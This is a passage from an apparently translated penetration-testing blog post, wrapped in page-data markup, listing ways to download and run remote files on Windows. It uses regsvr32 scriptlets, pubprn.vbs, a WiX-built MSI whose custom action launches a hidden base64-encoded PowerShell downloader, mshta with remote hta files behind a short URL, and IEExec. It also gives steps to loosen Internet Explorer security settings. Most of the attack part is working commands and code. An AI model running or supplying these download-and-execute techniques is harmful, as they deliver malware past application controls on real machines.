code\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>WScript.CreateObject(\"WScript.Shell\").Run \"c:\\download\\a.exe\",0,true \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Still using the sct file as a template, adding functionality to generate downloadexec2.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct scrobj.dll\u003C\u002Fp>\u003Ch3>5、pubprn.vbs\u003C\u002Fh3>\u003Cp>Using pubprn.vbs enables execution of sct files on remote servers (sct file formats may differ)\u003C\u002Fp>\u003Cp>\u003Cstrong>Approach:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsve32-&gt;VBScript-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>Code has been uploaded, address: https:\u002F\u002Fraw.githubusercontent.某开源项目.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cscript \u002Fb C:\\Windows\\System32\\Printing_Admin_Scripts\\zh-CN\\pubprn.vbs 127.0.0.1 script:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct\u003C\u002Fp>\u003Cp>Alternatively, the following approach can be used (code omitted):\u003C\u002Fp>\u003Cp>regsve32-&gt;JScript-&gt;powershell-&gt;download&amp;exec\u003C\u002Fp>\u003Ch3>6、msiexec\u003C\u002Fh3>\u003Cp>This method was previously introduced in my two articles 'msiexec in Penetration Testing' and 'Penetration Techniques - Switching from Admin to System Privileges', details omitted here\u003C\u002Fp>\u003Cp>First encode the PowerShell download-and-execute code in base64:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fileContent = \"(new-object System.Net.WebClient).DownloadFile('https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe','c:\\download\\a.exe');start-process 'c:\\download\\a.exe'\"\u003Cbr>$bytes  = [System.Text.Encoding]::Unicode.GetBytes($fileContent);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes);\u003Cbr>$encoded\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Result:\u003C\u002Fp>\u003Cp>KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003C\u002Fp>\u003Cp>The complete PowerShell command is:\u003C\u002Fp>\u003Cp>powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003C\u002Fp>\u003Cp>The complete WIX file is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003Cwix xmlns=\"http:\u002F\u002Fschemas.microsoft.com\u002Fwix\u002F2006\u002Fwi\">\u003Cbr>  \u003Cproduct id=\"*\" upgradecode=\"12345678-1234-1234-1234-111111111111\" name=\"Example Product \u003Cbr>Name\" version=\"0.0.1\" manufacturer=\"@_xpn_\" language=\"1033\">\u003Cbr>    \u003Cpackage installerversion=\"200\" compressed=\"yes\" comments=\"Windows Installer Package\">\u003Cbr>    \u003Cmedia id=\"1\">\u003Cbr>\u003Cbr>    \u003Cdirectory id=\"TARGETDIR\" name=\"SourceDir\">\u003Cbr>      \u003Cdirectory id=\"ProgramFilesFolder\">\u003Cbr>        \u003Cdirectory id=\"INSTALLLOCATION\" name=\"Example\">\u003Cbr>          \u003Ccomponent id=\"ApplicationFiles\" guid=\"12345678-1234-1234-1234-222222222222\">     \u003Cbr>          \u003C\u002Fcomponent>\u003Cbr>        \u003C\u002Fdirectory>\u003Cbr>      \u003C\u002Fdirectory>\u003Cbr>    \u003C\u002Fdirectory>\u003Cbr>\u003Cbr>    \u003Cfeature id=\"DefaultFeature\" level=\"1\">\u003Cbr>      \u003Ccomponentref id=\"ApplicationFiles\">\u003Cbr>    \u003C\u002Fcomponentref>\u003C\u002Ffeature>\u003Cbr>\u003Cbr>    \u003Cproperty id=\"cmdline\">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003Cbr>    \u003C\u002Fproperty>\u003Cbr>\u003Cbr>    \u003Ccustomaction id=\"SystemShell\" execute=\"deferred\" directory=\"TARGETDIR\" \u003Cbr=\"\">ExeCommand='[cmdline]' Return=\"ignore\" Impersonate=\"no\"\u002F&gt;\u003Cbr>\u003Cbr>    \u003Ccustomaction id=\"FailInstall\" execute=\"deferred\" script=\"vbscript\" return=\"check\">\u003Cbr>      invalid vbs to fail install\u003Cbr>    \u003C\u002Fcustomaction>\u003Cbr>\u003Cbr>    \u003Cinstallexecutesequence>\u003Cbr>      \u003Ccustom action=\"SystemShell\" after=\"InstallInitialize\">\u003C\u002Fcustom>\u003Cbr>      \u003Ccustom action=\"FailInstall\" before=\"InstallFiles\">\u003C\u002Fcustom>\u003Cbr>    \u003C\u002Finstallexecutesequence>\u003Cbr>\u003Cbr>  \u003C\u002Fcustomaction>\u003C\u002Fmedia>\u003C\u002Fpackage>\u003C\u002Fproduct>\u003Cbr>\u003C\u002Fwix>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile it to generate an msi file with the following commands:\u003C\u002Fp>\u003Cp>candle.exe msigen.wix\u003C\u002Fp>\u003Cp>light.exe msigen.wixobj\u003C\u002Fp>\u003Cp>Generate test.msi\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>`msiexec \u002Fq \u002Fi an open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After execution, manually terminate the process msiexec.exe\u003C\u002Fp>\u003Ch3>7、mshta\u003C\u002Fh3>\u003Cp>mshta supports http and https\u003C\u002Fp>\u003Cp>However, when mshta executes hta scripts, similar to a browser, it performs corresponding parsing operations based on the link's response headers, so it only runs when the response header is html\u003C\u002Fp>\u003Cp>Otherwise, it will be parsed as plain text\u003C\u002Fp>\u003Cp>For code on GitHub, the returned format is text\u002Fplain\u003C\u002Fp>\u003Cp>If executed with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002Fraw.githubusercontent.com\u002F3gstudent\u002Ftest\u002Fmaster\u002Fcalc.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>the code will be treated as text and cannot be parsed as html, causing the script to fail to execute\u003C\u002Fp>\u003Cp>But we can change our approach:\u003C\u002Fp>\u003Cp>Upload the hta file to a GitHub blog, and it will be parsed as html, enabling code execution\u003C\u002Fp>\u003Cp>Upload the hta file to a GitHub blog, with the address being https:\u002F\u002Fsome-open-source-project\u002Ftest\u002Fcalc.hta\u003C\u002Fp>\u003Cp>Execute the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fcalc.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully launches the calculator\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This idea comes from DM_\u003C\u002Fp>\u003Cp>Add functionality to achieve download and execution, with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fdownloadexec.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>A pop-up indicates that security settings on this computer prohibit accessing data sources from other domains, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017964712_0_01c0bcfe43-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>IE browser - Internet Options - Security\u003C\u002Fp>\u003Cp>Select Trusted Sites, add the blog address: https:\u002F\u002Fanopensourceproject\u002F\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017968528_1_8fa66fe541-1.jpeg\">\u003C\u002Fp>\u003Cp>Custom Level, find 'Access data sources across domains', select Enable\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017975011_2_a7a31b2e8e-1.jpeg\">\u003C\u002Fp>\u003Cp>Test again, successfully achieving the download and execution functionality\u003C\u002Fp>\u003Cp>Through the above tests, we found that the IE browser by default blocks download functionality implemented via VBS scripts\u003C\u002Fp>\u003Cp>Therefore, we can boldly speculate that if download and execution are implemented using PowerShell instead, it will not be blocked\u003C\u002Fp>\u003Cp>Modify the script and upload it to GitHub\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fdownloadexec2.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After testing, this method is usable\u003C\u002Fp>\u003Cp>Use a short URL\u003C\u002Fp>\u003Cp>Interestingly, http:\u002F\u002Fdwz.cn\u002F does not support this domain\u003C\u002Fp>\u003Cp>Switch to another short URL website: http:\u002F\u002Fsina.lt\u002F\u003C\u002Fp>\u003Cp>Generate a short URL, the final command is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta http:\u002F\u002Ft.cn\u002FRYUQyF8\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The final shortest character length achieved is 25\u003C\u002Fp>\u003Ch2>0x04 Supplement\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. IEExec\u003C\u002Fh3>\u003Cp>Requires administrator privileges\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\\u003Cbr>caspol -s off\u003Cbr>IEExec http:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The exe must meet specific format requirements\u003C\u002Fp>\u003Cp>For details, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Froom362.com\u002Fpost\u002F2014\u002F2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>I failed to reproduce this on Windows 7\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article summarizes methods for downloading files from GitHub via cmd, with the shortest implementation being mshta http:\u002F\u002Ft.cn\u002FRYUQyF8\u003C\u002Fp>\u003Cp>The minimum character length achieved is 25\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",995,"Onedaysec",5,"published","2026-02-02T07:51:00.061Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"GitHub File Download Methods via CMD - Penetration Techniques","GitHub download, cmd techniques, penetration testing, PowerShell, certutil, bitsadmin, regsvr32, file execution",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46],571,570,569,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.667Z","2026-07-23T16:01:45.444Z","draft","2026-07-23T16:13:26.954Z"]